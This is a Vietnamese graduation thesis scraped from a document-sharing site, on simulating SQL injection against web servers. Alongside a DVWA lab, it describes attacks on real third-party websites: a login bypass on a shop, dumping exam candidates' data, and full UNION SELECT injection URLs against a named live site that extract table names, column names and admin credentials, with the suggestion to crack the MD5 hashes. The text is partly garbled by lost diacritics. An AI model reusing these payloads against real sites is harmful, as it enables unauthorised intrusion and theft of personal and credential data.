1. Trang chủ
  2. » Luận Văn - Báo Cáo

Đồ án mô phỏng tấn công SQL injection vào web server

64 65 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 64
Dung lượng 22,47 MB
File đính kèm demo3.rar (11 KB)

Nội dung

Mẫu Đồ Án Tốt Nghiệp KHOA CÔNG NGHỆ THÔNG TIN BỘ MÔN MẠNG MÁY TÍNH ​​​​ CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lập Tự do Hạnh phúc ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP ĐẠI HỌC Sinh viên thực hiện TT Mã sinh viê.

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỎ ĐỊA CHẤT NGUYỄN VĂN TÀI ĐỒ ÁN TỐT NGHIỆP NGÀNH CÔNG NGHỆ THÔNG TIN ĐỀ TÀI TRIỂN KHAI MÔ PHỎNG TẤN CÔNG SQL INJECTION VÀO WEB SERVER HÀ NỘI - 2022 BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC MỎ ĐỊA CHẤT NGUYỄN VĂN TÀI ĐỒ ÁN TỐT NGHIỆP CHUN NGÀNH MẠNG MÁY TÍNH ĐỀ TÀI TRIỂN KHAI MƠ PHỎNG TẤN CÔNG SQL INJECTION VÀO WEB SERVER Sinh viên thực Cán hướng dẫn Nguyễn Văn Tài TS Phạm Đình Tân Hà Nội - 2022 Đồ án tốt nghiệp chun ngành Mạng Máy Tính KHOA CƠNG NGHỆ THƠNG TIN BỘ MƠN MẠNG MÁY TÍNH CỘNG HỊA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lập - Tự - Hạnh phúc ĐỀ CƯƠNG ĐỒ ÁN TỐT NGHIỆP ĐẠI HỌC Sinh viên thực hiện: Mã sinh viên TT Họ tên 1821050857 Lớp Điện thoại E-mail Nguyễn DCCTMM63B 0374238233 taikhoa233@gmail.com Văn Tài Giảng viên hướng dẫn: TT Mã cán Họ tên Đơn vị Điện thoại Bộ môn TS Phạm 0801-15 Mạng máy 0966665187 Đình Tân tính E-mail phamdinhtan@humg.edu.vn Tên đề tài: Triển khai mô công SQL Injection vào Web Server Lý chọn đề tài Với mong muốn tìm hiểu sâu lĩnh vực công, bảo mật liệu, hệ thống sau tốt nghiệp trở thành người quản trị mạng, quản trị hệ thống em chọn đề tài “Triển khai công mô công SQL Injection vào Web Server” Mục tiêu - Trình bày thông tin kiến thức mức độ nghiêm trọng bảo - mật liệu Hiểu rõ cấu trúc sở liệu ứng dụng web Nắm cách thức hoạt động cơng Trình bày cách thức thực cơng SQL Injection Ứng dụng kiến thức tìm hiểu nêu số phương pháp bảo mật Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính - Hoàn thành phát triển đồ án Các nhiệm vụ cụ thể - Trình bày khái niệm tổng quan bảo mật hệ thống, bảo vệ liệu Trình bày khái niệm cơng liên quan tới liệu, nêu mức độ nghiêm trọng đưa số biện pháp bảo mật cho loại hình - cơng Giới thiệu cơng SQL Injection Triển khai mô công, công thực tế tổng hợp kết đạt Kế hoạch thực Tuần  Thời gian  Nội dung công việc  03/07/2022-10/07/2022 Xây dựng khung Đồ án tốt nghiệp theo mẫu 11/07/2022-17/07/2022 Tìm hiểu nghiên cứu liên quan 18/07/2022-24/07/2022 Tìm hiểu khái niệm cấu trúc sở liệu, mơi trường cơng 25/07/2022-31/07/2022 Tìm hiểu công cụ công cụ hỗ trợ công SQL Injection 01/08/2022-07/08/2022 Tiến hành kiểm tra công cụ công lựa chọn 08/08/2022-14/08/2022 Cài đặt công cụ công, khai thác chức cơng cụ 15/08/2022-21/08/2022 Tiến hành mơ phịng cơng SQL Injection môi trường mô 22/08/2022-28/08/2022 Tiến hành tìm kiếm trang web triển khai cơng vào website thực tế 29/08/2022-04/09/2022 Hoàn thiện Đồ án tốt nghiệp 10 05/09/2022-11/09/2022 Hoàn thiện Đồ án tốt nghiệp Nơi thực đồ án Bộ mơn Mạng máy tính, Khoa Công nghệ thông tin, Trường Đại học Mỏ- Địa chất Hà Nội, ngày tháng năm 2022 Sinh viên thực Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Giảng viên hướng dẫn TS Phạm Đình Tân Nguyễn Văn Tài Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính MỤC LỤC DANH MỤC CÁC HÌNH ẢNH LỜI CẢM ƠN MỞ ĐẦU CHƯƠNG TỔNG QUAN VỀ AN TỒN VÀ BẢO MẬT THƠNG TIN 1.1.Tổng quan an tồn bảo mật thơng tin 1.1.1.Giới thiệu an tồn bảo mật thơng tin .8 1.1.2.Hành vi xâm phạm liệu chiến lược an toàn hệ thống 1.1.3 Mức bảo vệ nguyên tắc chung an tồn bảo mâṭ thơng tin 11 1.2.Một số kiểu công vào Web Server13 1.2.1 Injection Attacks (Tấn công tiêm nhiễm) 13 1.2.2 Tấn công DoS / DdoS 14 1.2.3 Tấn công Brute Force 16 1.2.4 Cross site Scripting (Lỗ hổng XSS ) .17 1.2.5 Website Attacks Snapshot .19 CHƯƠNG SQL INJECTION, PHÒNG THỦ VÀ BẢO MẬT 2.1.Giới thiệu SQL Injection 20 20 2.1.1.Gới thiệu chung SQL Injection 20 2.1.2.Phân tích nguyên nhân, mục đích cơng 21 2.1.3.Kiến trúc web .23 2.1.4.Cách thức công nhận biết SQL Injection 24 2.1.5.Phòng thủ Bảo mật 26 CHƯƠNG 3:TRIỂN KHAI TẤN CƠNG SQL INJECTION VÀO WEB SERVER 28 3.1.Mơ 28 3.2 Mô 40 3.3 Mô 44 KẾT LUẬN 50 TÀI LIỆU THAM KHẢO 51 Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính DANH MỤC CÁC HÌNH ẢNH Hình 1-1: Xâm phạm liệu Hình 1-2: Hình ảnh công chèn mã độc injection 14 Hình 1-3: Tấn cơng DoS DDoS 15 Hình 1-4: Tấn công Brute-force .16 Hình 1-5: Khai thác lỗ hổng XSS 17 Hình 1-6: Lỗ hổng XSS 18 Hình 2-1: Tấn công SQL Injection 21 Hình 2-2: Tấn cơng tiêm nhiễm .22 Hình 3-1:Khởi động Xampp 29 Hình 3-2: Đăng nhập DVWA 29 Hình 3-3: Đăng nhập thành cơng 30 Hình 3-4:Thiết lập chế độ bảo mật 31 Hình 3-5: Thiết lập chế độ bảo mật thành công .31 Hình 3-6: Khai thác liệu 32 Hình 3-7: Khai thác liệu (user localhost) 33 Hình 3-8: Khai thác liệu (Cổng port 3306 MySQL) 34 Hình 3-9: Khai thác liệu (Database DVWA) 34 Hình 3-10: Khai thác liệu (CSDL DVWA) .35 Hình 3-11: Khai thác liệu (Các bảng mục dvwa) 36 Hình 3-12: Khai thác liệu (các cột có bảng user) 36 Hình 3-13: Các tài khoản người dùng thu .37 Hình 3-14: Giải mã kí tự MD5 38 Hình 3-15: Đăng nhập liệu tìm 38 Hình 3-16: Trang chủ SDG Bắc Giang 39 Hình 3-17: Tra cứu điểm thi số báo danh 40 Hình 3-18: Tra cứu điểm thi thành công 41 Hình 3-19: Thơng tin tất thí sinh sau khai thác lỗ hổng SQL Injection .41 Hình 3-20: Thơng tin tất thí sinh sau khai thác lỗ hổng SQL Injection(2) 42 Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-21: Trang chủ website bán hàng 43 Hình 3-22: Thơng tin trang bán hàng .44 Hình 3-23: Đăng nhập thơng tin tài khoản 45 Hình 3-24: Vượt qua đăng nhập câu lệnh SQL .45 Hình 3-25: Sử dụng quyền truy cập Administrator 46 Hình 3-26: Thêm sửa xóa mơ tả sản phẩm 46 Hình 3-27: Thêm sản phẩm thành công 47 Hình 3-28: Truy cập thơng tin người dùng 48 Hình 3-29: Thay đổi thông tin người dùng 48 Hình 3-30: Thay đổi thơng tin người dùng 49 Hình 3-31: Kiểm tra độ mạnh trang web .54 Hình 3-32: Tìm cột bị lỗi website 55 Hình 3-33: Tên user localhost 55 Hình 3-34:Tìm database 56 Hình 3-35: Version website 57 Hình 3-36: Thơng tin bảng database 58 Hình 3-37: Thơng tin cột database 59 Hình 3-38: Thơng tin tài khoản mật người quản trị .60 Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính LỜI CẢM ƠN Em xin gửi lời cảm ơn chân thành sâu sắc tới thầy mơn, người tận tình giảng dạy truyền đạt kiến thức cần thiết, kinh nghiệm quý báu cho em suốt thời gian học tập Trường Đại học Mỏ - Địa chất để em thực đồ án Đặc biệt em xin chân thành cảm ơn thầy TS Phạm Đình Tân người tận tình hướng dẫn, bảo hỗ trợ em suốt trình thực đồ án Trong thời gian làm đồ án thầy, em học hỏi thêm nhiều kiến thức, khả làm việc độc lập có trách nhiệm với cơng việc Mặc dù em cố gắng hoàn thiện đồ án phạm vi khả thân chắn không tránh khỏi thiếu sót Em mong nhận thơng cảm góp ý thầy bạn Nguyễn Văn Tài Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-22: Thơng tin trang bán hàng Tiếp theo, đăng nhập tài khoản mật hệ thống trả : Đăng nhập thất bại Hình 3-23: Đăng nhập thông tin tài khoản bất kì Tiến hành thao tác vượt qua đăng nhập câu lệnh SQL Nguyễn Văn Tài 48 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-24: Vượt qua đăng nhập câu lệnh SQL Hình 3-25: Sử dụng quyền truy cập Administrator Ngay sau vượt qua đăng nhập, url chuyển sang trang quản trị Administrator chứa nhiều liệu quan trọng ngành hàng, thông tin sản phẩm Nguyễn Văn Tài 49 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Với quyền truy cập Admin tự sử dụng tính mà người quản trị xây dựng thêm hay sửa xóa sản phẩm Hình 3-26: Thêm sửa xóa mơ tả sản phẩm Có thể thêm sản phảm, mã sản phẩm, giá sản phẩm cập nhật kênh bán hàng Nguyễn Văn Tài 50 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-27: Thêm sản phẩm thành công Và sửa sản phẩm hay xóa sản phẩm khơng mang lại khó khăn Hình 3-28: Truy cập thông tin người dùng Thông tin người dùng dễ dàng lấy thay đổi thông tin người dùng đăng nhập thông tin người dùng vừa khai thác Nguyễn Văn Tài 51 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-29: Thay đổi thơng tin người dùng Trong thực tế, website tồn đọng lỗi SQL Injection hạn chế lớn doanh nghiệp thông tin quản trị bị đánh cắp, ảnh hưởng đến doanh thu lợi nhuận điều kiện tất yếu cho phát triển doanh nghiệp Để hạn chế tổn thất liệu công SQL Injection xảy việc vượt qua đăng nhập sử dụng số biện pháp : Sử dụng hàm hỗ trợ mysql_real_escape_string (MySQL), hay pg_escape_string (PostgreSQL) Đối với hệ quản trị sở liệu khơng có hàm xử lý kí tự đặc biệt dùng hàm hỗ trợ ngơn ngữ lập trình để xử lý adslashes PHP Nguyễn Văn Tài 52 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính 3.4 Mơ Mơi trường thực hiện: Khai thác lỗi website thực tế Website thực hiện: https://www.mayinchuyennhiet.vn/?php=product_detail&id=306 Tiến hành khai thác liệu: Lưu ý không thực hành động thông tin xâm phạm thông tin liệu cá nhân hay tổ chức chưa cho phép Lời cam đoan: Người thực cam đoan không công khai hay sử dụng liệu thu vào mục đích xấu, trục lợi cá nhân Truy cập vào trang web: https://www.mayinchuyennhiet.vn/?php=product_detail&id=306 kiểm tra chỗ yếu website cách thêm kí tự ‘ vào sau url Hình 3-30: Trang chủ website khai thác thông tin Trang chủ website sau thêm kí tự đặc biệt “ ’ ” xuất biểu thị lỗi SQL cho phép cơng SQL Injection Nguyễn Văn Tài 53 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-31: Kiểm tra độ mạnh trang web Tiếp theo, để khai thác thông tin bảng Database ta cần dò cột cột bị lỗi để trả đưa vào câu lệnh để công trang web câu lệnh order by select Nguyễn Văn Tài 54 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-32: Tìm cột bị lỗi website Sau thêm câu lệnh select kết trả cột số bị lỗi Có thể khai thác số thơng tin tên database, user localhost, version website Nguyễn Văn Tài 55 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-33: Tên user localhost Hình 3-34: Tên Database Nguyễn Văn Tài 56 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-35: Version website Để khai thác số thơng tin quan trọng ta dùng câu lệnh select cụ thể là: https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306%20union %20select %201,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables %20where%20table_schema=database() Nguyễn Văn Tài 57 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-36: Thơng tin bảng database Dữ liệu nhận sau công bảng Database: Tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_p roduct_hot,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor Sau thu thập liệu bảng database, tiếp tục khai thác liệu cột câu lệnh: https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306%20union %20select %201,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26%20from%20information_schema.columns %20where%20table_schema=database() Kết thu tất cột nằm database Nguyễn Văn Tài 58 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính Hình 3-37: Thông tin cột database Thu được: id,code,name,detail,date_added,last_modified,id,code,name_vn,name_en,parent,det ail_short_vn,detail_short_en,detail_vn,detail_en,cot1_vn,cot1_en,cot2_vn,cot2_en,c ot3_vn,cot3_en,image_vn,image_en,image_large_vn,image_large_en,sort,status,ne w,date_added,last_modified,lang,id,code,name,parent,detail_short,detail,image,ima ge_large,sort,status,date_added,last_modified,lang,id,code,price,name_vn,name_en, parent,maker,mother,babyone,babytwo,subject_vn,subject_en,detail_short_vn,detail _short_en,detail_vn,detail_en,image,image_large,image_largeb,image_largec,image _larged,sort,status,date_added,last_modified,lang,id,code,name_vn,name_en,parent, detail_short_vn,detail_short_en,detail_vn,detail_en,image_vn,image_en,image_larg e_vn,image_large_en,sort,status,date_added,last_modified,lang,color,new,id,produc t_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,l ast_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,uid,pw d,cat_id,session_id,activity,member,ip_address,url,user Xác định thông tin quan trọng người dùng tài khoản mật nằm bảng tbl_user Thực lệnh: Nguyễn Văn Tài 59 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306%20union %20select %201,2,3,unhex(hex(group_concat(uid,0x3a,pwd,0x3a))),5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26%20from%20tbl_user Hình 3-38: Thông tin tài khoản mật người quản trị Thơng tin thu id người dùng password mã hóa MD5 Có thể mã hóa kí tự MD5 mà tìm mật người dùng tiến hành đăng nhập Kết thúc q trình cơng SQL Injection Nguyễn Văn Tài 60 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính KẾT LUẬN Tóm lại, Cơng nghệ thơng tin phát triển, mức độ tiêu dùng tăng cao việc lưu trữ bảo mật thông tin liệu người dùng vô quan trọng Qua thời gian nghiên cứu thực làm đồ án mô công Sql Injection vào web server em phần nắm chất mức độ quan trọng việc bảo mật thông tin Đồ án nghiên cứu giới thiệu số cách thức câu lệnh công SQL Injection cách thức bảo mật loại hình cơng nguy hiểm nhằm mục đích hạn chế tối thiểu thiệt hại xảy Mặc dù cố gắng việc nghiên cứu thực đồ án, thời gian hiểu biết em hạn chế nên đồ án dừng lại mức đơn giản, cần thêm thời gian để phát triển hoàn thiện tốt mặt kiến thức, đồ án chắn tránh khỏi thiếu sót em thực cần thêm đóng góp từ hội đồng Nguyễn Văn Tài 61 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính TÀI LIỆU THAM KHẢO Các tài liệu từ Internet [1] Website CyStack: https://www.w3schools.com/sql/sql_injection.asp [2] Website Wikipedia: https://vi.wikipedia.org/wiki/SQL_injection Nguyễn Văn Tài 62 ... TÀI ĐỒ ÁN TỐT NGHIỆP CHUYÊN NGÀNH MẠNG MÁY TÍNH ĐỀ TÀI TRIỂN KHAI MƠ PHỎNG TẤN CÔNG SQL INJECTION VÀO WEB SERVER Sinh viên thực Cán hướng dẫn Nguyễn Văn Tài TS Phạm Đình Tân Hà Nội - 2022 Đồ án. .. Nguyễn Văn Tài 22 Đồ án tốt nghiệp chuyên ngành Mạng Máy Tính CHƯƠNG GIỚI THIỆU VỀ TẤN CÔNG SQL INJECTION 2.1.Tổng quan về SQL Injection 2.1.1.Gới thiệu chung SQL Injection SQL Injection kỹ thuật... trúc web .23 2.1.4.Cách thức công nhận biết SQL Injection 24 2.1.5.Phòng thủ Bảo mật 26 CHƯƠNG 3:TRIỂN KHAI TẤN CƠNG SQL INJECTION VÀO WEB SERVER 28 3.1.Mơ 28 3.2 Mô

Ngày đăng: 03/12/2022, 12:13

HÌNH ẢNH LIÊN QUAN

Hình GIỚI THIỆU VỀ TẤN CƠNG SQL INJECTION-3: Tấn công chèn mã. - Đồ án mô phỏng tấn công SQL injection vào web server
nh GIỚI THIỆU VỀ TẤN CƠNG SQL INJECTION-3: Tấn công chèn mã (Trang 30)
Hình GIỚI THIỆU VỀ TẤN CƠNG SQL INJECTION-4: Mô tả bảo mật SQL Injection. - Đồ án mô phỏng tấn công SQL injection vào web server
nh GIỚI THIỆU VỀ TẤN CƠNG SQL INJECTION-4: Mô tả bảo mật SQL Injection (Trang 32)
Tiếp theo, thực hiện khai thác các bảng có trong CSDL của DVWA bằng câu lệnh: ['UNION  select  table_name,null  from information_schema.tables where table_schema='dvwa'-- -] - Đồ án mô phỏng tấn công SQL injection vào web server
i ếp theo, thực hiện khai thác các bảng có trong CSDL của DVWA bằng câu lệnh: ['UNION select table_name,null from information_schema.tables where table_schema='dvwa'-- -] (Trang 40)
Hình 3-11: Khai thác dữ liệu (Các bảng trong mục dvwa) - Đồ án mô phỏng tấn công SQL injection vào web server
i ̀nh 3-11: Khai thác dữ liệu (Các bảng trong mục dvwa) (Trang 41)
Hình 3-12: Khai thác dữ liệu (các cột có trong bảng user) - Đồ án mô phỏng tấn công SQL injection vào web server
i ̀nh 3-12: Khai thác dữ liệu (các cột có trong bảng user) (Trang 42)
Thu được dữ liệu như hình. - Đồ án mô phỏng tấn công SQL injection vào web server
hu được dữ liệu như hình (Trang 47)
Tiếp theo, để khai thác các thông tin các bảng trong Database ta cần dò các cột và những cột bị lỗi để trả về khi đưa vào các câu lệnh để tấn công trang web bằng các câu lệnh order by và select. - Đồ án mô phỏng tấn công SQL injection vào web server
i ếp theo, để khai thác các thông tin các bảng trong Database ta cần dò các cột và những cột bị lỗi để trả về khi đưa vào các câu lệnh để tấn công trang web bằng các câu lệnh order by và select (Trang 56)
Hình 3-36: Thông tin các bảng trong database. - Đồ án mô phỏng tấn công SQL injection vào web server
i ̀nh 3-36: Thông tin các bảng trong database (Trang 60)

TỪ KHÓA LIÊN QUAN

w